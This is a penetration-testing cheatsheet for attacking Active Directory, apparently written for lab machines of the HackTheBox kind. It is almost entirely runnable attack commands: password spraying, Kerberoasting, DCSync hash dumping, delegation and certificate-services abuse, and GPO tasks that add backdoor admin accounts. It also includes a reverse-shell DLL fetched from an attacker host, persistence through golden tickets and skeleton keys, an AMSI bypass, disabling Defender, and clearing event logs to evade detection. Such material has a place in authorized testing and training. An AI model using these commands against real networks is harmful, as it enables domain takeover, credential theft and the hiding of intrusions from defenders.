Active Directory Attack Paths Cheatsheet¶

Initial Enumeration¶

Network Scanning¶

# Quick SYN scan
sudo nmap -sS -p- --min-rate 10000 -Pn -n $TARGET -oN all_syn.txt

# Extract open ports and detailed scan
PORTS=$(grep "open" all_syn.txt | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'); 
sudo nmap -sVC -p $PORTS -Pn -n $TARGET -oN vuln_scan.txt

# UDP scan for DNS/LDAP
sudo nmap -sU -p 53,88,123,137,138,161,389,500,623 -Pn -n $TARGET

Domain Enumeration (Unauthenticated)¶

# Get domain info via LDAP
ldapsearch -x -H ldap://$DC_IP -s base namingcontexts

# DNS enumeration
dnsrecon -d $DOMAIN -n $DC_IP -t std,srv,axfr
dnsenum --dnsserver $DC_IP --enum -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt $DOMAIN

# RPC enumeration
rpcclient -U "" -N $DC_IP -c "enumdomusers"
enum4linux -a $DC_IP

Attack Path 1: Password Spray → BloodHound → Privilege Escalation¶

Step 1: User Enumeration¶

# Via Kerbrute
kerbrute userenum --dc $DC_IP -d $DOMAIN /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

# Via RID cycling
impacket-lookupsid $DOMAIN/guest@$DC_IP -no-pass | grep "SidTypeUser"

# Create user list
cat users.txt | awk -F'\' '{print $2}' | awk '{print $1}' > domain_users.txt

Step 2: Password Spray¶

# Using NetExec (formerly CrackMapExec)
netexec smb $DC_IP -u domain_users.txt -p 'Password123!' --continue-on-success

# Using Kerbrute
kerbrute passwordspray --dc $DC_IP -d $DOMAIN domain_users.txt 'Summer2024!'

# Using Spray-AD
spray-ad -U domain_users.txt -P passwords.txt -d $DOMAIN -dc $DC_IP

Step 3: BloodHound Collection¶

# Python collector
bloodhound-python -u 'olivia' -p 'ichliebedich' -d $DOMAIN -dc $DC_IP -c all --zip

# SharpHound via Evil-WinRM
evil-winrm -i $DC_IP -u 'olivia' -p 'ichliebedich'
*Evil-WinRM* PS > upload SharpHound.exe
*Evil-WinRM* PS > .\SharpHound.exe -c All -d $DOMAIN --zipfilename loot.zip
*Evil-WinRM* PS > download loot.zip

Step 4: BloodHound Analysis¶

# Find owned users
MATCH (u:User) WHERE u.user_tags CONTAINS 'owned' RETURN u

# Shortest path to Domain Admin
MATCH p=shortestPath((u:User {name:"[email protected]"})-[*1..]->(g:Group {name:"DOMAIN [email protected]"})) RETURN p

# Find Kerberoastable users
MATCH (u:User) WHERE u.hasspn=true RETURN u

# Find AS-REP roastable users
MATCH (u:User) WHERE u.dontreqpreauth=true RETURN u

# Find computers with unconstrained delegation
MATCH (c:Computer) WHERE c.unconstraineddelegation=true RETURN c

Attack Path 2: ForceChangePassword → Shadow Credentials → DCSync¶

Step 1: Identify ForceChangePassword Rights¶

# Using BloodHound
MATCH p=(u:User {name:"[email protected]"})-[:ForceChangePassword]->(v) RETURN p

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get writable --detail

Step 2: Change Target Password¶

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' set password 'michael' 'Passw0rd123!'

# Using rpcclient
rpcclient -U 'DOMAIN\olivia%ichliebedich' $DC_IP -c "setuserinfo2 michael 23 'Passw0rd123!'"

# Using PowerView (if on Windows)
Set-DomainUserPassword -Identity michael -Password (ConvertTo-SecureString 'Passw0rd123!' -AsPlainText -Force) -Credential $cred

Step 3: Add Shadow Credentials¶

# Generate certificate and add shadow creds
certipy shadow auto -u 'michael'@$DOMAIN -p 'Passw0rd123!' -account 'ethan' -dc-ip $DC_IP

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'michael' -p 'Passw0rd123!' add shadowCredentials 'ethan'

# Authenticate with the certificate
python3 PKINITtools/gettgtpkinit.py -cert-pem cert.pem -key-pem key.pem $DOMAIN/ethan ethan.ccache
export KRB5CCNAME=ethan.ccache

# Get NTLM hash
python3 PKINITtools/getnthash.py -key key.pem -cert cert.pem -dc-ip $DC_IP $DOMAIN/ethan

Step 4: DCSync (if user has replication rights)¶

# Using secretsdump
impacket-secretsdump $DOMAIN/'ethan':'password'@$DC_IP

# Using mimikatz (on Windows)
lsadump::dcsync /domain:$DOMAIN /all /csv
lsadump::dcsync /domain:$DOMAIN /user:Administrator

# Using NetExec
netexec smb $DC_IP -u 'ethan' -p 'password' -M ntdsutil

Attack Path 3: GenericWrite → RBCD → Computer Account Takeover¶

Step 1: Add Computer Account¶

# Using impacket
impacket-addcomputer $DOMAIN/'olivia':'ichliebedich' -computer-name 'ATTACKER$' -computer-pass 'AttackerPass123!'

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add computer 'ATTACKER$' 'AttackerPass123!'

# Using PowerMad (on Windows)
New-MachineAccount -MachineAccount "ATTACKER" -Password $(ConvertTo-SecureString 'AttackerPass123!' -AsPlainText -Force)

Step 2: Configure RBCD¶

# Add RBCD rights
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add rbcd 'TARGET$' 'ATTACKER$'

# Using rbcd.py
rbcd.py -d $DOMAIN -u 'olivia' -p 'ichliebedich' -dc-ip $DC_IP -t 'TARGET$' -f 'ATTACKER$' -a write

Step 3: Get Service Ticket¶

# Request service ticket
impacket-getST -spn 'cifs/target.domain.local' -impersonate 'Administrator' $DOMAIN/'ATTACKER$':'AttackerPass123!' -dc-ip $DC_IP

# Export and use ticket
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass $DOMAIN/[email protected]

Attack Path 4: Kerberoasting → Crack → Lateral Movement¶

Step 1: Find Kerberoastable Users¶

# Using GetUserSPNs
impacket-GetUserSPNs $DOMAIN/'olivia':'ichliebedich' -dc-ip $DC_IP -request -outputfile kerberoast.hash

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=user)(servicePrincipalName=*))"

# Using Rubeus (on Windows)
Rubeus.exe kerberoast /outfile:kerberoast.hash

Step 2: Targeted Kerberoasting (if you have GenericWrite)¶

# Add SPN to target user
bloodyAD --host $DC_IP -d $DOMAIN -u 'emily' -p 'password' add servicePrincipalName 'ethan' 'MSSQLSvc/fake.domain.local'

# Kerberoast the user
impacket-GetUserSPNs $DOMAIN/'emily':'password' -dc-ip $DC_IP -request-user 'ethan' -outputfile ethan.hash

# Using targetedKerberoast
targetedKerberoast.py -v -d $DOMAIN -u 'emily' -p 'password' -u 'ethan'

Step 3: Crack Hashes¶

# Using hashcat
hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt --force

# Using john
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast.hash --format=krb5tgs

Step 4: Lateral Movement¶

# Test credentials
netexec smb $SUBNET -u 'ethan' -p 'limpbizkit' --continue-on-success

# WinRM access
evil-winrm -i $TARGET -u 'ethan' -p 'limpbizkit'

# PSExec
impacket-psexec $DOMAIN/'ethan':'limpbizkit'@$TARGET

# WMIExec (stealthier)
impacket-wmiexec $DOMAIN/'ethan':'limpbizkit'@$TARGET

Attack Path 5: AS-REP Roasting → AddMember → Group Privileges¶

Step 1: AS-REP Roasting¶

# Find AS-REP roastable users
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile domain_users.txt -format hashcat

# Using specific user
impacket-GetNPUsers $DOMAIN/'olivia':'ichliebedich' -dc-ip $DC_IP -request -format hashcat

# Using Rubeus (Windows)
Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash

Step 2: Make User AS-REP Roastable (if you have write rights)¶

# Disable pre-auth
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add uac 'target_user' -f DONT_REQ_PREAUTH

# Using PowerView
Set-DomainObject -Identity 'target_user' -XOR @{useraccountcontrol=4194304}

Step 3: Add User to Privileged Group¶

# Add to group
bloodyAD --host $DC_IP -d $DOMAIN -u 'michael' -p 'password' add groupMember 'Remote Desktop Users' 'olivia'

# Using net commands (from Windows)
net group "Domain Admins" olivia /add /domain

# Using PowerView
Add-DomainGroupMember -Identity 'Remote Desktop Users' -Members 'olivia'

Attack Path 6: WriteDACL → Grant DCSync → Dump Hashes¶

Step 1: Identify WriteDACL Rights¶

# BloodHound query
MATCH p=(u:User {name:"[email protected]"})-[:WriteDacl]->(g:Group) RETURN p

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get writable

Step 2: Grant DCSync Rights¶

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add dcsync 'olivia'

# Using dacledit.py
python3 dacledit.py -d $DOMAIN -u 'olivia' -p 'ichliebedich' -t 'CN=Domain,DC=domain,DC=local' -pr 'olivia' -ace 'DS-Replication-Get-Changes,DS-Replication-Get-Changes-All'

# Using PowerView (Windows)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity olivia -Rights DCSync

Step 3: Perform DCSync¶

# Dump all hashes
impacket-secretsdump $DOMAIN/'olivia':'ichliebedich'@$DC_IP

# Dump specific user
impacket-secretsdump $DOMAIN/'olivia':'ichliebedich'@$DC_IP -just-dc-user Administrator

# Using mimikatz (Windows)
lsadump::dcsync /domain:$DOMAIN /user:Administrator

Attack Path 7: Constrained Delegation Abuse¶

Step 1: Find Delegation¶

# Find constrained delegation
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=user)(msDS-AllowedToDelegateTo=*))"

# BloodHound query
MATCH (u:User) WHERE u.allowedtodelegate IS NOT NULL RETURN u

# Using PowerView
Get-DomainUser -TrustedToAuth

Step 2: Request Service Ticket¶

# Get TGT for service account
impacket-getTGT $DOMAIN/'service_account':'password' -dc-ip $DC_IP

# Request service ticket with protocol transition
impacket-getST -spn 'cifs/target.domain.local' -impersonate 'Administrator' -k -no-pass $DOMAIN/'service_account' -dc-ip $DC_IP

# Using Rubeus (Windows)
Rubeus.exe s4u /user:service_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt

Step 3: Access Target¶

# Export ticket
export KRB5CCNAME=Administrator.ccache

# Access via SMB
impacket-smbclient -k -no-pass $DOMAIN/[email protected]

# Get shell
impacket-psexec -k -no-pass $DOMAIN/[email protected]

Attack Path 8: ADCS (Certificate Services) Abuse¶

Step 1: Enumerate Certificate Templates¶

# Using Certipy
certipy find -u 'olivia'@$DOMAIN -p 'ichliebedich' -dc-ip $DC_IP -vulnerable

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(objectClass=pKICertificateTemplate)"

Step 2: ESC1 - Request Certificate for Another User¶

# Request certificate as another user
certipy req -u 'olivia'@$DOMAIN -p 'ichliebedich' -target $CA_SERVER -ca 'CA-NAME' -template 'VulnerableTemplate' -upn '[email protected]'

# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip $DC_IP

Step 3: ESC8 - Web Enrollment Relay Attack¶

# Setup relay
ntlmrelayx.py -t http://$CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Coerce authentication
petitpotam.py -u 'olivia' -p 'ichliebedich' -d $DOMAIN $ATTACKER_IP $DC_IP

Attack Path 9: Machine Account Quota → Computer Account → RBCD¶

Step 1: Check Machine Account Quota¶

# Check current quota
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get object 'DC=domain,DC=local' --attr ms-DS-MachineAccountQuota

# Using ldapsearch
ldapsearch -x -H ldap://$DC_IP -D "olivia@$DOMAIN" -w 'ichliebedich' -b "DC=domain,DC=local" "(objectClass=domain)" ms-DS-MachineAccountQuota

Step 2: Add Computer Account¶

# Add computer
impacket-addcomputer $DOMAIN/'olivia':'ichliebedich' -computer-name 'EVIL$' -computer-pass 'EvilPass123!'

# Clear SPNs (for renaming attack)
addspn.py --clear -t 'EVIL$' -u $DOMAIN/'olivia' -p 'ichliebedich' $DC_IP

# Rename computer (if you have rights)
rename-machine.py -current-name 'EVIL$' -new-name 'DC01$' -dc-ip $DC_IP $DOMAIN/'olivia':'ichliebedich'

Step 3: Configure and Abuse RBCD¶

# Add RBCD
rbcd.py -d $DOMAIN -u 'olivia' -p 'ichliebedich' -dc-ip $DC_IP -t 'TARGETCOMP$' -f 'EVIL$' -a write

# Get service ticket
impacket-getST -spn 'cifs/targetcomp.domain.local' -impersonate 'Administrator' $DOMAIN/'EVIL$':'EvilPass123!' -dc-ip $DC_IP

# Access target
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass [email protected]

Attack Path 10: LAPS Abuse → Local Admin → Token Impersonation¶

Step 1: Find LAPS Rights¶

# Find who can read LAPS
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"

# Using NetExec
netexec ldap $DC_IP -u 'olivia' -p 'ichliebedich' -M laps

Step 2: Read LAPS Password¶

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get object 'COMPUTER01$' --attr ms-Mcs-AdmPwd

# Using NetExec
netexec smb $TARGET -u 'olivia' -p 'ichliebedich' --laps

# Using ldapsearch
ldapsearch -x -H ldap://$DC_IP -D "olivia@$DOMAIN" -w 'ichliebedich' -b "DC=domain,DC=local" "(name=COMPUTER01$)" ms-Mcs-AdmPwd

Step 3: Use Local Admin Access¶

# Access with local admin
impacket-psexec Administrator:'LAPS_PASSWORD'@$TARGET_IP

# Dump local hashes
impacket-secretsdump Administrator:'LAPS_PASSWORD'@$TARGET_IP -outputfile local_hashes

# Token impersonation (once on the box)
# Using incognito
load incognito
list_tokens -u
impersonate_token "DOMAIN\Administrator"

Attack Path 11: GPO Abuse → Deploy Malicious Policy¶

Step 1: Find GPO Rights¶

# BloodHound query
MATCH p=(u:User {name:"[email protected]"})-[:GenericWrite|WriteProperty|WriteDacl]->(g:GPO) RETURN p

# Using PowerView
Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty"}

Step 2: Create Malicious GPO¶

# Using SharpGPOAbuse (Windows)
SharpGPOAbuse.exe --AddComputerTask --TaskName "EvilTask" --Author "Microsoft" --Command "cmd.exe" --Arguments "/c net user attacker Passw0rd! /add && net localgroup administrators attacker /add" --GPOName "Vulnerable GPO"

# Using pygpoabuse
python3 pygpoabuse.py $DOMAIN/'olivia':'ichliebedich' -gpo-id {GPO_ID} -command 'net user attacker Passw0rd! /add'

Step 3: Force GPO Update¶

# Force update remotely
impacket-atexec $DOMAIN/'olivia':'ichliebedich'@$TARGET "gpupdate /force"

# Using scheduled task
impacket-schtasks $DOMAIN/'olivia':'ichliebedich'@$TARGET -c "gpupdate /force"

Attack Path 12: Unconstrained Delegation → Printer Bug → Admin Takeover¶

Step 1: Find Unconstrained Delegation¶

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get search --filter "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))"

# BloodHound query
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

Step 2: Setup Monitoring¶

# Monitor for incoming tickets (on compromised unconstrained delegation host)
Rubeus.exe monitor /interval:5 /nowrap

# Using krbrelayx
krbrelayx.py -t ldap://$DC_IP

Step 3: Coerce Authentication¶

# SpoolSample (Printer Bug)
SpoolSample.exe $DC_HOSTNAME $UNCONSTRAINED_HOST

# PetitPotam
petitpotam.py -u 'olivia' -p 'ichliebedich' -d $DOMAIN $UNCONSTRAINED_HOST $DC_IP

# PrinterBug.py
python3 printerbug.py $DOMAIN/'olivia':'ichliebedich'@$DC_IP $UNCONSTRAINED_HOST

Step 4: Extract and Use Ticket¶

# Export captured ticket
Rubeus.exe ptt /ticket:BASE64_TICKET

# DCSync with captured DC ticket
mimikatz # lsadump::dcsync /domain:$DOMAIN /all

Attack Path 13: WriteOwner → Change ACLs → Full Control¶

Step 1: Identify WriteOwner Rights¶

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' get writable --detail | grep -i owner

# BloodHound query
MATCH p=(u:User {name:"[email protected]"})-[:WriteOwner]->(n) RETURN p

Step 2: Change Object Owner¶

# Using bloodyAD
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' set owner 'TargetGroup' 'olivia'

# Using PowerView
Set-DomainObjectOwner -Identity 'TargetGroup' -OwnerIdentity 'olivia'

Step 3: Grant Full Control¶

# Add GenericAll rights
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add genericAll 'TargetGroup' 'olivia'

# Using PowerView
Add-DomainObjectAcl -TargetIdentity 'TargetGroup' -PrincipalIdentity 'olivia' -Rights All

Attack Path 14: DNS Admin Abuse → DLL Injection → System Access¶

Step 1: Add User to DNS Admins¶

# If you have rights to add
bloodyAD --host $DC_IP -d $DOMAIN -u 'olivia' -p 'ichliebedich' add groupMember 'DnsAdmins' 'olivia'

# Using net commands
net group "DnsAdmins" olivia /add /domain

Step 2: Configure Malicious DLL¶

# Generate reverse shell DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f dll > evil.dll

# Host DLL on SMB share
impacket-smbserver share . -smb2support

# Configure DNS to load DLL
dnscmd.exe $DC_HOSTNAME /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dll

Step 3: Restart DNS Service¶

# Stop/Start DNS service
sc.exe \\$DC_HOSTNAME stop dns
sc.exe \\$DC_HOSTNAME start dns

# Or using PowerShell
Restart-Service -Name DNS -Force -ComputerName $DC_HOSTNAME

Attack Path 15: SeBackupPrivilege Abuse → NTDS Extraction¶

Step 1: Check Privileges¶

# Check current privileges (from shell)
whoami /priv

# Using PowerShell
Get-Acl -Path "C:\Windows\NTDS" | fl

Step 2: Backup NTDS.dit¶

# Using diskshadow
echo "set context persistent nowriters" > shadow.txt
echo "add volume c: alias vss" >> shadow.txt
echo "create" >> shadow.txt
echo "expose %vss% z:" >> shadow.txt
diskshadow /s shadow.txt

# Copy NTDS files
robocopy /b z:\windows\ntds . ntds.dit
reg save HKLM\SYSTEM system.hive

# Using ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

Step 3: Extract Hashes¶

# Using secretsdump locally
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

# Using NTDSDumpEx
NTDSDumpEx -d ntds.dit -s system.hive -o domain_hashes.txt

Post-Exploitation Commands¶

Persistence¶

# Golden Ticket
impacket-ticketer -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN Administrator

# Silver Ticket
impacket-ticketer -nthash $SERVICE_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -spn cifs/target.domain.local Administrator

# Skeleton Key
mimikatz # privilege::debug
mimikatz # misc::skeleton

# DSRM Password
mimikatz # lsadump::setntlm /user:Administrator /ntlm:$NTLM_HASH

Credential Harvesting¶

# DPAPI Extraction
mimikatz # dpapi::masterkey /in:masterkey_file /sid:$USER_SID /password:$PASSWORD

# Credential Manager
mimikatz # vault::list
mimikatz # vault::cred

# Browser Passwords
SharpChrome.exe logins /unprotect

# WiFi Passwords
netsh wlan show profiles
netsh wlan show profile name="PROFILE_NAME" key=clear

Defense Evasion¶

# AMSI Bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

# Clear Event Logs
wevtutil cl Security
wevtutil cl System
wevtutil cl Application

Useful Tools Reference¶

Collection Tools¶

BloodHound/SharpHound: AD relationship mapping
ADExplorer: Live AD browsing
PingCastle: AD security assessment
Purple Knight: AD security scanner

Exploitation Tools¶

Impacket Suite: Python AD attack tools
Rubeus: Kerberos abuse toolkit
Mimikatz: Credential extraction
PowerSploit/PowerView: PowerShell post-exploitation
Certipy: ADCS exploitation
bloodyAD: AD privilege escalation toolkit
NetExec: Network service exploitation

Credential Tools¶

hashcat: Password cracking
john: Password cracking
Responder: LLMNR/NBT-NS poisoning
mitm6: IPv6 DNS takeover

Lateral Movement¶

evil-winrm: WinRM shell
psexec/smbexec/wmiexec: Remote execution
proxychains: Proxy tool
chisel/ligolo: Tunneling tools

Quick Wins Checklist¶

Anonymous/Guest Access

netexec smb $DC_IP -u '' -p ''
netexec smb $DC_IP -u 'guest' -p ''
rpcclient -U "" -N $DC_IP

Default Credentials

netexec smb $DC_IP -u administrator -p 'admin'
netexec smb $DC_IP -u users.txt -p passwords.txt

AS-REP Roasting (No Auth)

impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt

Password in Description

ldapsearch -x -H ldap://$DC_IP -D "" -w "" -b "DC=domain,DC=local" "(&(objectClass=user)(description=*pass*))" description
netexec ldap $DC_IP -u 'olivia' -p 'password' -M get-desc-users

SMB Shares Enumeration

smbclient -L //$DC_IP -N
smbmap -H $DC_IP -u guest
netexec smb $DC_IP -u 'olivia' -p 'password' --shares

Kerberoasting (Quick)

impacket-GetUserSPNs $DOMAIN/'olivia':'password' -dc-ip $DC_IP -request

BloodHound Collection (Quick)

bloodhound-python -u 'olivia' -p 'password' -d $DOMAIN -dc $DC_IP -c DCOnly

Check for Print Spooler

rpcdump.py $DC_IP | grep -i spooler
ls -la \\\\$DC_IP\\pipe\\spoolss

Environment Variables Reference¶

# Common variables used throughout commands
export DOMAIN="administrator.htb"
export DC_IP="10.10.11.42"
export DC_HOSTNAME="DC01"
export TARGET="target.administrator.htb"
export SUBNET="10.10.11.0/24"
export ATTACKER_IP="10.10.14.5"
export CA_SERVER="ca.administrator.htb"

# Kerberos configuration
export KRB5CCNAME=ticket.ccache

# Proxy configuration for pivoting
export proxychains_conf="/etc/proxychains4.conf"

Common Troubleshooting¶

Clock Skew Issues¶

# Sync time with DC
sudo ntpdate $DC_IP
# Or
sudo timedatectl set-ntp off
sudo ntpdate -s $DC_IP

Kerberos Issues¶

# Add to /etc/krb5.conf
[libdefaults]
    default_realm = DOMAIN.LOCAL
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    rdns = false

[realms]
    DOMAIN.LOCAL = {
        kdc = dc.domain.local
        admin_server = dc.domain.local
    }

SMB Signing/Encryption¶

# Check SMB signing
netexec smb $DC_IP --gen-relay-list signing.txt

# For older systems
smbclient -L //$DC_IP -N --option='client min protocol=NT1'

LDAP Channel Binding¶

# Check if enforced
netexec ldap $DC_IP -u '' -p '' -M ldap-checker

# Use LDAPS if required
ldapsearch -H ldaps://$DC_IP:636 -x -s base -b "" "(objectclass=*)"

Detection Evasion Tips¶

Timing and Throttling

# Slow down password spraying
for user in $(cat users.txt); do
    netexec smb $DC_IP -u $user -p 'Password123!' --continue-on-success
    sleep 300  # 5 minutes between attempts
done

Use Different Protocols

# Rotate between SMB, LDAP, Kerberos
kerbrute passwordspray --dc $DC_IP -d $DOMAIN users.txt 'Password1!'
netexec ldap $DC_IP -u users.txt -p 'Password1!'
netexec winrm $DC_IP -u users.txt -p 'Password1!'

Obfuscate PowerShell

# Base64 encode commands
$command = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Domain'))
powershell -EncodedCommand $command

Living Off the Land

# Use built-in Windows tools
wmic /node:$TARGET process call create "cmd /c whoami > c:\temp\out.txt"
schtasks /create /s $TARGET /tn "Updates" /tr "cmd /c whoami" /sc once /st 23:00

Forensics and Cleanup¶

Remove Artifacts¶

# Clear command history
history -c
cat /dev/null > ~/.bash_history

# Remove Kerberos tickets
kdestroy -A
rm -f *.ccache

# Clear Windows event logs
Get-EventLog -List | ForEach-Object {Clear-EventLog -LogName $_.Log}

# Remove created accounts
net user attacker /delete /domain
bloodyAD --host $DC_IP -d $DOMAIN -u 'admin' -p 'password' remove computer 'EVIL

Check for Detection¶

# Check security logs for your activity
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625,4768,4769,4776}

# Check for honey tokens
Get-ADUser -Filter * -Properties Description | Where {$_.Description -like "*honey*"}

Notes¶

OPSEC: Always check for honeypots, canary tokens, and monitoring before executing attacks
Persistence: Establish multiple forms of persistence before conducting noisy operations
Documentation: Keep detailed logs of all commands and results for reporting
Legal: Only perform these attacks in authorized penetration tests or your own lab environment
Updates: Tools and techniques evolve; always check for the latest versions and methods

Contact & Updates¶

For updates and more cheatsheets, visit: https://www.0xczr.com/tools/

Last Updated: August 2025